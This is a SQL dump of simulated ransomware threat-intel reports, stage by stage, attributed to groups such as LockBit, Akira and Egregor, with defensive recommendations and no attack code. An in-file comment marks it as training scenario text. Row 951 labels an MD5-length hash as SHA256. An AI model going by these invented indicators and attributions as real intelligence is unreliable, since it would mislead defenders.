(903, 182, 1549, 3, 'Persistence Mechanism Analysis', '### Overview\nThe attackers have successfully installed persistence mechanisms, allowing them to maintain access to the compromised server despite system reboots.\n\n### Technical Details\n- **Persistence Techniques**: Scheduled tasks and registry modifications.\n- **Tools Used**: Commonly used APT tools for persistence include Cobalt Strike and Empire.\n\n### Recommendations\n- Review and clean up scheduled tasks and registry keys.\n- Implement strict monitoring of task scheduler activities.\n\n### Next Steps\nMonitor for unusual lateral movement as attackers may attempt to spread across the network leveraging the established foothold.', '2026-03-15 19:12:22'),
(904, 182, 1550, 4, 'Lateral Movement and Data Exfiltration', '### Overview\nUnusual lateral movement activities detected, suggesting attempts to access other systems within the network. Data exfiltration attempts have also been identified.\n\n### Technical Details\n- **Lateral Movement Tools**: Use of RDP and SMB protocols to explore network.\n- **Data Exfiltration Method**: Encrypted archives being transferred via HTTP/S.\n\n### Recommendations\n- Restrict lateral movement by tightening network segmentation.\n- Monitor outbound traffic for large or unusual data transfers.\n\n### Next Steps\nStrengthen defenses against ransomware deployment as data exfiltration often precedes such attacks.', '2026-03-15 19:12:22'),
(905, 182, 1551, 5, NULL, NULL, '2026-03-15 19:12:22'),
(906, 183, 1552, 1, 'Analysis of Phishing Tactics', '### Overview\nFollowing the detection of a phishing email, an analysis was conducted to understand the tactics employed by Vice Society to gain initial access.\n\n### Key Findings\n- **Target Audience**: The phishing email was directed primarily at school administrators and IT staff, mimicking official education department communications.\n- **Social Engineering**: The email contained urgent language, prompting recipients to update security credentials immediately.\n- **Payload**: A malicious link disguised as a document download was identified, leading to a credential harvesting site.\n\n### Recommendations\n- Conduct phishing awareness training for staff.\n- Implement email filtering solutions to detect and quarantine suspicious emails.', '2026-03-15 19:12:42'),
(907, 183, 1553, 2, 'Investigation of Malicious Script Execution', '### Overview\nFollowing the phishing email, a malicious script was executed, indicating an advancement in the attack chain.\n\n### Key Findings\n- **Script Origin**: The script was executed from a compromised user account.\n- **Capabilities**: It was designed to disable endpoint security solutions and establish command and control with the attacker\'s server.\n- **Indicators of Compromise (IOCs)**: Detected hash values and IP addresses have been logged for further investigation.\n\n### Recommendations\n- Isolate affected systems from the network.\n- Perform a thorough forensic analysis to trace the script’s activity.', '2026-03-15 19:12:42'),
(908, 183, 1554, 3, 'Backdoor Establishment Analysis', '### Overview\nPost-execution of the malicious script, a backdoor was established, allowing persistent access for Vice Society.\n\n### Key Findings\n- **Backdoor Type**: A remote access tool disguised as a legitimate application was identified.\n- **Persistence Mechanism**: The backdoor employed registry modifications and scheduled tasks to maintain access.\n- **Communication**: The backdoor communicated with external IPs linked to known Vice Society infrastructure.\n\n### Recommendations\n- Remove unauthorized applications and registry entries.\n- Enhance monitoring to detect anomalous network traffic.', '2026-03-15 19:12:42'),
(909, 183, 1555, 4, 'Internal Network Scanning and Data Exfiltration', '### Overview\nAfter the backdoor establishment, internal network scanning was detected, followed by data exfiltration activities.\n\n### Key Findings\n- **Scanning Techniques**: Utilized a network scanning tool to identify vulnerable systems and sensitive data locations.\n- **Exfiltration Channels**: Data was exfiltrated via encrypted channels to evade detection.\n- **Impact**: Sensitive student data, including personal and academic information, was targeted.\n\n### Recommendations\n- Immediately implement network segmentation to restrict lateral movement.\n- Deploy data loss prevention (DLP) solutions to monitor and protect sensitive data.', '2026-03-15 19:12:42'),
(910, 183, 1556, 5, NULL, NULL, '2026-03-15 19:12:42'),
(911, 184, 1557, 1, 'Analysis of Initial Phishing Email', '# Analysis of Initial Phishing Email\n\n## Overview\nThe initial alert was triggered by a suspicious phishing email detected within the network. This email serves as the first vector of attack in the Hive ransomware campaign.\n\n## Email Details\n- **Sender Address**: compromised_user@knowncompany.com\n- **Subject Line**: Urgent Invoice Payment Required\n- **Attachments**: Invoice_Payment_Details.zip\n\n## Analysis\nThe email contains a ZIP file attachment which, when decompressed, reveals a malicious script. The script is designed to execute upon opening, providing an entry point for further attack vectors.\n\n## Next Steps\nThe investigation will focus on the execution of the malicious payload associated with the script to assess the depth of the breach and its potential implications.', '2026-03-15 19:13:09'),
(912, 184, 1558, 2, 'Execution of Malicious Payload', '# Execution of Malicious Payload\n\n## Overview\nFollowing the phishing email, the execution of the malicious payload was detected. This represents the second phase of the Hive ransomware infiltration.\n\n## Payload Behavior\n- **File Name**: payload.exe\n- **Execution Path**: C:\\\\Users\\\\Public\\\\payload.exe\n- **Observed Actions**: The payload initiates a series of commands to disable local security protocols and establish a foothold within the system.\n\n## Analysis\nThe payload is confirmed to be a variant of the Hive ransomware. It executes scripts that disable security defenses, facilitating further malicious activities.\n\n## Next Steps\nFocus will shift to identifying the establishment of persistent backdoor mechanisms that allow attackers to maintain access.', '2026-03-15 19:13:09'),
(913, 184, 1559, 3, 'Establishment of Persistent Backdoor', '# Establishment of Persistent Backdoor\n\n## Overview\nThe next phase involves the establishment of a persistent backdoor, allowing continuous access to the compromised network.\n\n## Backdoor Mechanisms\n- **Registry Modification**: Autostart entry added under `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`\n- **Service Creation**: A new system service designed to run at startup has been detected.\n\n## Analysis\nThe persistence mechanisms are designed to ensure the ransomware can reinfect the system even after potential removal attempts.\n\n## Next Steps\nEfforts will now pivot to detecting lateral movement as threat actors attempt to propagate the infection across the network.', '2026-03-15 19:13:09'),
(914, 184, 1560, 4, 'Lateral Movement Detected Across Network', '# Lateral Movement Detected Across Network\n\n## Overview\nLateral movement has been identified within the network, indicating an attempt to spread the ransomware to additional systems.\n\n## Techniques Used\n- **Credential Dumping**: Utilization of tools like Mimikatz to extract credentials\n- **Remote Desktop Protocol (RDP)**: Unauthorized RDP connections have been logged\n\n## Analysis\nThe attackers are leveraging compromised credentials to move through the network, increasing the threat level as more systems become at risk.\n\n## Next Steps\nThe priority is to monitor for data exfiltration attempts, as attackers may seek to extract sensitive information from the network.', '2026-03-15 19:13:09'),
(915, 184, 1561, 5, NULL, NULL, '2026-03-15 19:13:09'),
(916, 185, 1562, 1, 'Post-Phishing Analysis: Entry Point Breakdown', '### Overview\nAfter the identification of a spear phishing campaign as the initial access vector, this report delves into the tactics employed by the attackers.\n\n### Phishing Tactics\n- **Email Subjects**: Crafted to appear as urgent HR notifications or security alerts.\n- **Attachments/Links**: Malicious documents or links leading to credential harvesting pages.\n\n### Recommendations\n- **User Education**: Conduct immediate awareness training focused on recognizing phishing attempts.\n- **Email Filtering**: Enhance email filtering mechanisms to detect and block suspicious emails.', '2026-03-15 19:13:33'),
(917, 185, 1563, 2, 'Rust-Based Ransomware: Execution Details', '### Overview\nFollowing the deployment of the Rust-based ransomware, this report examines the encryption methodologies and execution flow.\n\n### Execution Flow\n- **Binary Characteristics**: The ransomware is written in Rust, which complicates reverse engineering.\n- **Encryption**: Utilizes advanced encryption algorithms targeting both local and networked resources.\n\n### Recommendations\n- **Endpoint Detection**: Employ behavioral analysis tools to detect anomalous processes.\n- **Patch Management**: Ensure all systems are up-to-date to mitigate exploitation of known vulnerabilities.', '2026-03-15 19:13:33'),
(918, 185, 1564, 3, 'Backdoor Persistence: Tactics Analyzed', '### Overview\nPost-ransomware deployment, attackers focus on establishing persistent access through backdoors.\n\n### Techniques Employed\n- **Backdoor Installation**: Leveraging system services to maintain access.\n- **Obfuscation**: Use of encryption and anti-forensic techniques to evade detection.\n\n### Recommendations\n- **Network Monitoring**: Intensify monitoring for unusual outbound connections.\n- **Access Controls**: Restrict administrative privileges and enforce MFA across all access points.', '2026-03-15 19:13:33'),
(919, 185, 1565, 4, 'Credential Dumping and Lateral Movement', '### Overview\nThe attackers shift focus to lateral movement through credential dumping, enhancing their network foothold.\n\n### Credential Dumping Methods\n- **Tool Usage**: Utilization of tools like Mimikatz to extract credentials.\n- **Exploitation of Weak Passwords**: Targeting accounts with insufficiently secure passwords.\n\n### Recommendations\n- **Password Policies**: Enforce strong, unique passwords and regular password changes.\n- **Network Segmentation**: Limit lateral movement capabilities by segmenting the network.', '2026-03-15 19:13:33'),
(920, 185, 1566, 5, NULL, NULL, '2026-03-15 19:13:33'),
(921, 186, 1567, 1, 'Malicious Payload Execution: Unpacking the Threat', '### Overview\nAfter the initial access through a sophisticated phishing campaign, the threat actors deployed a malicious payload. This payload is central to the ransomware\'s execution phase.\n\n### Technical Analysis\nThe payload used by LockBit is typically a custom-built executable designed to bypass common security measures. It leverages obfuscation techniques and employs anti-analysis checks to evade detection.\n\n### Implications\nSuccessful execution of this payload indicates a high risk of encryption of critical data. It is imperative to deploy endpoint detection and response (EDR) solutions to mitigate the impact.\n\n### Recommendations\n- **Immediate Response:** Isolate affected systems to prevent further spread.\n- **Detection:** Utilize behavioral analysis tools to identify suspicious activity indicative of ransomware execution.\n- **Prevention:** Educate employees about phishing tactics to reduce the risk of initial access.', '2026-03-15 19:15:07'),
(922, 186, 1568, 2, 'Establishing Persistence: A Deeper Dive', '### Overview\nFollowing the execution of the LockBit payload, establishing persistence is crucial for the ransomware to maintain its presence and control over compromised systems.\n\n### Technical Analysis\nLockBit employs multiple techniques to ensure persistence, including the modification of registry keys and the creation of scheduled tasks. These methods ensure the ransomware remains active even after a system reboot.\n\n### Implications\nPersistence mechanisms allow the threat actors to execute further malicious activities and complicate recovery efforts.\n\n### Recommendations\n- **Detection:** Monitor for unusual modifications in registry keys and new scheduled tasks.\n- **Remediation:** Regularly review and audit system configurations for unauthorized changes.\n- **Mitigation:** Implement application whitelisting to prevent unauthorized code execution.', '2026-03-15 19:15:07'),
(923, 186, 1569, 3, 'Lateral Movement: Strategies and Techniques', '### Overview\nOnce persistence is established, LockBit operators focus on lateral movement to expand their reach within the network.\n\n### Technical Analysis\nLateral movement often involves the use of legitimate credentials obtained through credential dumping techniques. Tools like Mimikatz may be employed to extract these credentials from memory.\n\n### Implications\nLateral movement increases the risk of additional systems being compromised and sensitive data being accessed or exfiltrated.\n\n### Recommendations\n- **Detection:** Implement network segmentation to limit lateral movement opportunities.\n- **Prevention:** Use multi-factor authentication (MFA) to protect privileged accounts.\n- **Response:** Continuously monitor network traffic for anomalies that may indicate lateral movement.', '2026-03-15 19:15:07'),
(924, 186, 1570, 4, 'Data Exfiltration: Protecting Sensitive Information', '### Overview\nAs lateral movement progresses, the primary objective of LockBit is often data exfiltration, which can precede encryption or be used for double extortion.\n\n### Technical Analysis\nData exfiltration methods include using FTP, HTTP, or HTTPS to transfer sensitive information to attacker-controlled servers. Encryption or compression of data prior to exfiltration is common to avoid detection.\n\n### Implications\nExfiltrated data can be used for extortion or sold on dark web marketplaces, posing significant risks to privacy and business operations.\n\n### Recommendations\n- **Detection:** Monitor outbound traffic for unusual data transfers, especially large volumes of data.\n- **Prevention:** Implement data loss prevention (DLP) solutions to detect and block unauthorized exfiltration attempts.\n- **Response:** Conduct regular audits of data access and implement stricter access controls to minimize data exposure.', '2026-03-15 19:15:07'),
(925, 186, 1571, 5, NULL, NULL, '2026-03-15 19:15:07'),
(926, 187, 1572, 1, 'Initial Access: Analysis of Suspicious VPN Login Attempt', '## Overview\nAfter detecting a suspicious VPN login attempt, further analysis has revealed indicators of compromise suggesting the involvement of the Akira ransomware group. The attempt originated from an IP address linked to previous cybercriminal activities.\n\n## Implications\nThe login attempt targeted Cisco VPN infrastructure, indicating a potential focus on exploiting known vulnerabilities or leveraging stolen credentials.\n\n## Recommendations\n- **Immediate Action**: Conduct a thorough review of all recent login attempts and cross-reference with known bad IPs.\n- **Preventive Measure**: Implement multi-factor authentication (MFA) across all VPN connections.', '2026-03-15 19:15:32'),
(927, 187, 1573, 2, 'Execution Phase: Malicious Payload Execution Detected', '## Overview\nFollowing the VPN breach, a malicious payload was executed within the network. This payload has been identified as a custom-built ransomware variant associated with Akira\'s operations.\n\n## Details\nThe payload exhibits advanced obfuscation techniques and is designed to evade detection by traditional security solutions.\n\n## Recommendations\n- **Immediate Action**: Isolate affected systems to prevent further spread.\n- **Preventive Measure**: Update antivirus signatures and employ behavioral analysis tools to enhance detection capabilities.', '2026-03-15 19:15:32'),
(928, 187, 1574, 3, 'Persistence: Creation of Persistent Backdoor', '## Overview\nPost-execution, a persistent backdoor was created on compromised systems, enabling the attackers to maintain access and control.\n\n## Details\nThe backdoor uses a combination of scheduled tasks and modified registry keys to ensure persistence across reboots.\n\n## Recommendations\n- **Immediate Action**: Identify and remove all unauthorized tasks and registry modifications.\n- **Preventive Measure**: Regularly audit system configuration changes and enhance monitoring of critical system directories.', '2026-03-15 19:15:32'),
(929, 187, 1575, 4, 'Lateral Movement: Propagation Across VMware ESXi Servers', '## Overview\nAttackers have initiated lateral movement, targeting VMware ESXi servers to expand their foothold within the infrastructure.\n\n## Details\nUtilizing compromised credentials and exploiting unpatched vulnerabilities, the attackers have gained unauthorized access to ESXi servers.\n\n## Recommendations\n- **Immediate Action**: Patch all VMware ESXi servers with the latest security updates.\n- **Preventive Measure**: Implement strict network segmentation to limit lateral movement capabilities.', '2026-03-15 19:15:32'),
(930, 187, 1576, 5, NULL, NULL, '2026-03-15 19:15:32'),
(931, 188, 1577, 1, 'Analysis of Phishing Email Campaign Tactics', '# Analysis of Phishing Email Campaign Tactics\n\n## Executive Summary\nThe initial access vector for the NoEscape ransomware operation has been identified as a phishing campaign targeting healthcare sector employees. This report provides analysis of the phishing tactics used, including subject lines, sender profiles, and malware delivery methods.\n\n## Details\n- **Subject Lines**: Common themes observed include urgent billing issues and COVID-19 updates.\n- **Sender Profiles**: The emails appear to originate from legitimate healthcare organizations, leveraging compromised email accounts.\n- **Malware Delivery**: Attachments containing malicious macros or links to credential phishing websites are used.\n\n## Recommendations\n- Implement email filtering solutions to detect and block phishing emails.\n- Conduct regular training for employees on phishing awareness.', '2026-03-15 19:15:50'),
(932, 188, 1578, 2, 'Malicious Macro Execution: Technical Breakdown', '# Malicious Macro Execution: Technical Breakdown\n\n## Overview\nFollowing the phishing email detection, the execution phase was triggered by a malicious macro embedded in an email attachment. This report delves into the macro\'s functionality and its role in the ransomware deployment.\n\n## Technical Details\n- **Macro Functionality**: Upon execution, the macro downloads an executable payload from a remote server.\n- **Obfuscation Techniques**: The macro uses obfuscation to evade detection, including character encoding and environment checks.\n- **Payload Characteristics**: The downloaded payload is a lightweight downloader that retrieves the main ransomware binary.\n\n## Mitigation Strategies\n- Disable macros in Microsoft Office by default.\n- Use endpoint protection solutions with macro protection capabilities.', '2026-03-15 19:15:50'),
(933, 188, 1579, 3, 'Scheduled Tasks for Persistence: Mechanism and Detection', '# Scheduled Tasks for Persistence: Mechanism and Detection\n\n## Context\nPost-execution, NoEscape ransomware establishes persistence through the creation of scheduled tasks. This report examines the methods used to maintain persistence and suggests detection strategies.\n\n## Persistence Mechanism\n- **Task Creation**: A new scheduled task is created to execute the ransomware binary at system startup or at regular intervals.\n- **Task Obfuscation**: Task names are designed to mimic legitimate system processes to avoid detection.\n\n## Detection and Response\n- Monitor for anomalous scheduled tasks creation.\n- Implement logging for task scheduler activities.\n- Regularly audit scheduled tasks for unauthorized entries.', '2026-03-15 19:15:50'),
(934, 188, 1580, 4, 'SMB Protocol Exploitation: Lateral Movement Insights', '# SMB Protocol Exploitation: Lateral Movement Insights\n\n## Introduction\nThis report focuses on the lateral movement stage of the NoEscape ransomware operation, specifically the exploitation of the SMB protocol to propagate across the network.\n\n## Lateral Movement Techniques\n- **SMB Exploitation**: Exploiting known vulnerabilities in SMB to move laterally between systems.\n- **Credential Harvesting**: Utilizing harvested credentials to access additional systems via SMB shares.\n\n## Defense Measures\n- Patch and update systems to address SMB vulnerabilities.\n- Implement network segmentation to limit lateral movement potential.\n- Employ intrusion detection systems to monitor SMB traffic for unusual activity.', '2026-03-15 19:15:50'),
(935, 188, 1581, 5, NULL, NULL, '2026-03-15 19:15:50'),
(936, 189, 1582, 1, 'Virtual Machine Deployment and Malicious Execution', '### Summary\nFollowing the initial access via a suspicious download from a known malicious domain, there is evidence of a new virtual machine being deployed. This VM is suspected to be leveraged by Ragnar Locker\'s ransomware operators for malicious activities.\n\n### Key Indicators\n- **VM Deployment:** A virtual machine was executed shortly after the initial access was granted.\n- **Malicious Intent:** The VM\'s configuration files indicate potential malicious payloads are being prepared.\n\n### Recommendations\n- Closely monitor virtual machine activities and configurations for unusual changes.\n- Implement strict access controls and verification processes for VM deployments.', '2026-03-15 19:16:11'),
(937, 189, 1583, 2, 'Persistence Mechanisms via VM Configuration', '### Summary\nAfter the execution of a virtual machine with suspected malicious intent, persistence mechanisms have been identified in the VM configuration settings. These configurations suggest efforts to maintain long-term access within the network.\n\n### Key Insights\n- **Configuration Changes:** Several unauthorized changes in the VM\'s configuration files have been detected.\n- **Scheduled Tasks:** Tasks are scheduled within the VM to ensure continuous operation and potential re-execution upon disruption.\n\n### Recommendations\n- Conduct a full audit of VM configurations and scheduled tasks.\n- Establish alerts for unauthorized configuration changes in virtual environments.', '2026-03-15 19:16:11'),
(938, 189, 1584, 3, 'Lateral Movement Techniques within Gaming Networks', '### Summary\nPost establishing persistence, there are signs of lateral movement within the gaming network. This suggests the adversaries are expanding their reach to potentially compromise additional systems.\n\n### Observations\n- **Network Scans:** Evidence of internal network scanning originating from the compromised VM to identify additional targets.\n- **Credential Harvesting:** Attempts to capture login credentials from various endpoints have been observed.\n\n### Recommendations\n- Implement network segmentation to limit lateral movement capabilities.\n- Increase logging and monitoring of network traffic for signs of unauthorized access.', '2026-03-15 19:16:11');
-- Intel-report rows for `operation_alerts` (continuation of the dump for this
-- table; the preceding statement holds rows 936-938). Each row attaches one
-- alert (`alert_id`) to an operation (`operation_id`) at a position
-- (`sequence_order`); rows 939-969 below cover operations 189-195.
-- `intel_report_content` is Markdown with newlines and apostrophes escaped for
-- the dump (\n, \'). The final row of each operation in this batch
-- (940, 944, 949, 954, 959, 965, 969) carries NULL title and content.
-- NOTE(review): this is scenario text for training, not live intelligence.
-- Row 951 labels a 32-hex-digit value (MD5 length) as a SHA256, so the sample
-- indicators are internally inconsistent; treat names, hashes and tools named
-- in these reports as exercise content rather than indicators to act on.
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(939, 189, 1585, 4, 'Data Exfiltration via Encrypted Channels', '### Summary\nThe final stage of Ragnar Locker\'s operation involves data exfiltration through encrypted channels. This step indicates preparation for potential ransom demands or unauthorized data disclosures.\n\n### Evidence\n- **Encrypted Traffic:** A notable increase in encrypted traffic from the VM to an external server has been detected.\n- **Data Staging:** Files of interest were staged within the VM prior to exfiltration attempts.\n\n### Recommendations\n- Investigate and block suspicious external connections.\n- Employ data loss prevention strategies to monitor and prevent unauthorized data transfers.', '2026-03-15 19:16:11'),
(940, 189, 1586, 5, NULL, NULL, '2026-03-15 19:16:11'),
(941, 190, 1587, 1, 'Investigation into Phishing Techniques Utilized by Mount Locker', '### Overview\nAfter the initial alert regarding phishing activity, our analysis reveals that the Mount Locker group leverages sophisticated phishing techniques to gain initial access into corporate networks.\n\n### Phishing Email Characteristics\n- **Sender Spoofing:** Emails appeared to originate from trusted business partners.\n- **Social Engineering:** Messages contained urgent requests for invoice verification or document review.\n- **Malicious Attachments:** Attachments disguised as PDFs contained embedded macros triggering the malware.\n\n### Recommendations\n- **User Training:** Enhance employee awareness programs focusing on phishing detection.\n- **Email Filtering:** Implement advanced threat protection to detect and quarantine suspicious emails before reaching end-users.\n\nThis report provides context and preparedness for the next phase of the attack, where payload execution is expected.', '2026-03-15 19:16:21'),
(942, 190, 1588, 2, 'Payload Execution and Initial Malware Analysis', '### Overview\nFollowing the detection of malware execution, a detailed analysis of the payload has been conducted to understand its capabilities and implications.\n\n### Key Findings\n- **Type of Malware:** The payload is identified as a variant of Mount Locker ransomware.\n- **Execution Method:** The malware utilizes PowerShell scripts to execute in-memory, reducing its footprint on the disk.\n- **Immediate Impact:** Initial file encryption detected on compromised endpoints.\n\n### Defensive Measures\n- **Endpoint Detection:** Deploy advanced EDR solutions to monitor and block suspicious scripts.\n- **Network Segmentation:** Limit the spread by ensuring critical data is isolated from infected endpoints.\n\nUnderstanding the payload\'s characteristics is crucial for anticipating persistence mechanisms employed by the attackers.', '2026-03-15 19:16:21'),
(943, 190, 1589, 3, 'Persistence Mechanisms and Scheduled Task Analysis', '### Overview\nPost payload execution, the adversaries have established persistence through scheduled tasks. This report delves into the methods used to maintain access.\n\n### Persistence Techniques\n- **Scheduled Tasks:** A task is created to run the ransomware at system start, ensuring continuous presence.\n- **Registry Modifications:** Entries are added to ensure tasks are re-created if deleted.\n\n### Recommendations\n- **Audit Scheduled Tasks:** Regularly review and audit scheduled tasks for unauthorized entries.\n- **Registry Monitoring:** Implement alerts for suspicious registry changes related to task creation.\n\nUnderstanding persistence aids in preempting the attackers\' lateral movement efforts, which are likely to follow.', '2026-03-15 19:16:21'),
(944, 190, 1590, 4, NULL, NULL, '2026-03-15 19:16:21'),
(945, 191, 1591, 1, 'Investigation into Spear Phishing Origins', '### Summary\nFollowing the detection of a spear phishing email, our analysis has traced the origins to a known phishing campaign linked to Maze ransomware affiliates. The email contained malicious attachments designed to deploy initial malware payloads.\n\n### Technical Details\n- **Sender:** Compromised legitimate business email addresses\n- **Attachments:** Encrypted ZIP files with embedded malware\n- **Targets:** High-level executives and financial departments\n\n### Recommendations\n- Conduct a thorough review of email filtering systems.\n- Implement immediate awareness training for all employees on recognizing phishing attempts.', '2026-03-15 19:16:51'),
(946, 191, 1592, 2, 'Analysis of Malware Execution on User Workstation', '### Summary\nPost malware execution on a user workstation, the analysis reveals the malware\'s capability to deploy additional payloads and establish a foothold within the network.\n\n### Technical Details\n- **Payload:** First-stage downloader leading to ransomware deployment\n- **Execution Method:** Exploitation of unpatched software vulnerabilities\n- **Indicators of Compromise (IOCs):**\n  - Unusual registry changes\n  - Network traffic to command and control (C2) servers\n\n### Recommendations\n- Isolate the infected workstation immediately.\n- Patch all software vulnerabilities across the network.', '2026-03-15 19:16:51'),
(947, 191, 1593, 3, 'Persistence Mechanism via Scheduled Task', '### Summary\nThe adversary has established persistence on the compromised system through the creation of a scheduled task designed to execute malicious scripts at regular intervals.\n\n### Technical Details\n- **Scheduled Task Name:** \'System Maintenance\'\n- **Script Execution:** Powershell scripts obfuscated to avoid detection\n- **Persistence Goal:** Maintain access and facilitate further lateral movement\n\n### Recommendations\n- Disable and remove unauthorized scheduled tasks.\n- Implement continuous monitoring for any new task creation attempts.', '2026-03-15 19:16:51'),
(948, 191, 1594, 4, 'Lateral Movement and Network Compromise', '### Summary\nLateral movement has been detected within the network, indicating the adversary\'s attempt to escalate privileges and access sensitive data across multiple systems.\n\n### Technical Details\n- **Methods Used:**\n  - Pass-the-Hash attacks\n  - Exploitation of SMB vulnerabilities\n- **Targeted Systems:** Domain controllers and file servers\n\n### Recommendations\n- Conduct a comprehensive audit of network access logs.\n- Reinforce network segmentation to limit lateral movement opportunities.', '2026-03-15 19:16:51'),
(949, 191, 1595, 5, NULL, NULL, '2026-03-15 19:16:51'),
(950, 192, 1596, 1, 'Analysis of Phishing Campaign Techniques', '## Overview\nFollowing the recent alert targeting retail employees, it is crucial to understand the phishing techniques employed by the Egregor group. This report will explore these techniques, focusing on spear-phishing emails designed to mimic internal communications.\n\n## Key Tactics\n- **Social Engineering:** Emails crafted to appear as urgent internal messages from senior management.\n- **Malicious Links and Attachments:** Utilization of links leading to credential-stealing websites or attachments containing malicious macros.\n\n## Recommendations\n- **Employee Training:** Implement regular phishing simulation exercises to enhance awareness.\n- **Email Filtering:** Strengthen email filtering solutions to detect and quarantine suspicious communications.\n', '2026-03-15 19:17:07'),
(951, 192, 1597, 2, 'Technical Analysis of Malicious Payload', '## Overview\nFollowing the detection of malicious payload execution, this report delves into the technical aspects of the payload used by Egregor.\n\n## Payload Characteristics\n- **Obfuscation:** Utilizes advanced obfuscation techniques to evade antivirus detection.\n- **Ransomware Component:** Once executed, it encrypts files with a robust encryption algorithm.\n\n## Indicators of Compromise (IOCs)\n- **File Names:** Commonly seen file names include `invoice.docx` and `update.exe`.\n- **Hashes:** SHA256: `d41d8cd98f00b204e9800998ecf8427e`\n\n## Mitigation Strategies\n- **Endpoint Protection:** Deploy advanced endpoint detection and response (EDR) solutions.\n- **Network Monitoring:** Set up alerts for unusual file execution patterns.\n', '2026-03-15 19:17:07'),
(952, 192, 1598, 3, 'Persistence Mechanisms and Countermeasures', '## Overview\nAs persistence mechanisms are established, understanding these techniques is vital to mitigate their effects.\n\n## Persistence Techniques\n- **Registry Keys:** Modification of Windows registry keys to maintain persistence.\n- **Scheduled Tasks:** Creation of scheduled tasks that ensure the payload re-executes upon system reboot.\n\n## Countermeasures\n- **Registry Monitoring:** Implement real-time monitoring of registry changes.\n- **System Hardening:** Disable unnecessary services and ports.\n\n## Conclusion\nDetecting and neutralizing persistence mechanisms is crucial to prevent further network infiltration by the ransomware group.\n', '2026-03-15 19:17:07'),
(953, 192, 1599, 4, 'Lateral Movement and Network Security Enhancements', '## Overview\nThis report addresses the lateral movement observed across the retail network, shedding light on how Egregor navigates internal systems.\n\n## Lateral Movement Tactics\n- **Credential Dumping:** Harvesting credentials from compromised systems to propagate.\n- **Remote Execution:** Utilizes tools like PsExec and Cobalt Strike to execute commands on remote machines.\n\n## Security Enhancements\n- **Network Segmentation:** Implement micro-segmentation to limit movement within the network.\n- **Access Controls:** Enforce strict access controls and regularly update passwords.\n\n## Next Steps\nStrengthening internal defenses is pivotal to thwart further movement and protect sensitive data from exfiltration.\n', '2026-03-15 19:17:07'),
(954, 192, 1600, 5, NULL, NULL, '2026-03-15 19:17:07'),
(955, 193, 1601, 1, 'Analysis of Phishing Tactics Employed by NetWalker', '### Overview\nAfter identifying a phishing email used as the initial access vector, a detailed examination of the email headers and content has been conducted. The email contained a malicious link, disguised as a legitimate communication from a trusted entity within the healthcare sector.\n\n### Key Findings\n- **Sender Spoofing**: The sender\'s address was spoofed to appear as a legitimate internal contact.\n- **Malicious Link**: The link redirected to a compromised website hosting a malicious script.\n- **Targets**: Primarily aimed at high-ranking officials to maximize impact.\n\n### Recommendations\n- Implement enhanced email filtering rules to detect similar phishing attempts.\n- Conduct awareness training to help staff identify phishing emails.', '2026-03-15 19:17:34'),
(956, 193, 1602, 2, 'Fileless PowerShell Execution: Techniques and Indicators', '### Overview\nFollowing the initiation of a fileless attack via PowerShell, further analysis has revealed the use of obfuscated scripts to execute malicious commands without leaving traces on the disk.\n\n### Key Findings\n- **Obfuscation**: The PowerShell scripts were heavily obfuscated to evade detection.\n- **Memory-Resident Execution**: Malicious activities were executed directly in memory, minimizing forensic evidence.\n- **Command and Control (C2) Communications**: Detected via encoded commands reaching out to C2 servers for further instructions.\n\n### Recommendations\n- Enable enhanced logging for PowerShell scripts to capture suspicious activities.\n- Utilize endpoint detection and response (EDR) tools to monitor and analyze memory-based activities.', '2026-03-15 19:17:34'),
(957, 193, 1603, 3, 'Scheduled Task Persistence Method Analysis', '### Overview\nA scheduled task was created to ensure persistence on compromised systems. This task was designed to re-initiate malicious activities after a system reboot.\n\n### Key Findings\n- **Task Name Mimicry**: The task was named to resemble legitimate system tasks to avoid detection.\n- **Execution Timing**: Configured to execute at system startup to maintain persistence.\n- **Payload Delivery**: Linked to a PowerShell script that re-establishes the connection with the C2 server.\n\n### Recommendations\n- Review and audit scheduled tasks regularly to identify unauthorized entries.\n- Implement policies to restrict the creation of scheduled tasks by non-administrative users.', '2026-03-15 19:17:34'),
(958, 193, 1604, 4, 'Credential Dumping Techniques and Lateral Movement Indicators', '### Overview\nUnauthorized access was detected, indicating an attempt at lateral movement through credential dumping techniques.\n\n### Key Findings\n- **Credential Harvesting**: Tools like Mimikatz were used to extract credentials from memory.\n- **Lateral Movement**: Compromised credentials were employed to access additional systems within the network.\n- **Targeted Systems**: Focused on servers containing sensitive healthcare and educational data.\n\n### Recommendations\n- Implement multi-factor authentication (MFA) to mitigate risks associated with credential theft.\n- Utilize network segmentation to limit lateral movement opportunities for attackers.', '2026-03-15 19:17:34'),
(959, 193, 1605, 5, NULL, NULL, '2026-03-15 19:17:34'),
(960, 194, 1606, 1, 'Analysis of Spear Phishing Tactics', '### Spear Phishing Email Detected\n\nFollowing the detection of a spear phishing email, analysis reveals that the email was crafted using social engineering techniques to target specific personnel with access to critical infrastructure. **Key Indicators:**\n- **Sender Email:** Spoofed to appear as a trusted internal source.\n- **Content:** Contains an urgent message urging immediate action.\n- **Attachments/Links:** Malicious attachment disguised as a critical update.\n\nThis report lays the groundwork for understanding how the attacker gained initial access, anticipating further malicious activity.', '2026-03-15 19:18:01'),
(961, 194, 1607, 2, 'Malicious Payload Analysis', '### Malicious Payload Activation\n\nAfter the execution of the spear phishing attack, a malicious payload was activated on the targeted system. **Key Analysis Points:**\n- **Payload Type:** The payload is identified as a variant of DoppelPaymer ransomware.\n- **Behavior:** It begins encrypting files and alters system settings.\n- **Potential Impact:** Immediate risk to data integrity and availability.\n\nUnderstanding this activation provides insight into the attacker\'s next steps, likely focusing on establishing persistence.', '2026-03-15 19:18:01'),
(962, 194, 1608, 3, 'Registry Key Modification Insights', '### Persistence Mechanism Identified\n\nPost-payload activation, modifications to the registry keys were detected, indicating attempts to establish persistence. **Key Details:**\n- **Registry Changes:** New entries created for auto-starting the ransomware on boot.\n- **Stealth Tactics:** Obfuscation techniques used to avoid detection by standard monitoring tools.\n\nThis persistence mechanism suggests the attacker’s intention to maintain long-term access, priming the environment for lateral movement.', '2026-03-15 19:18:01'),
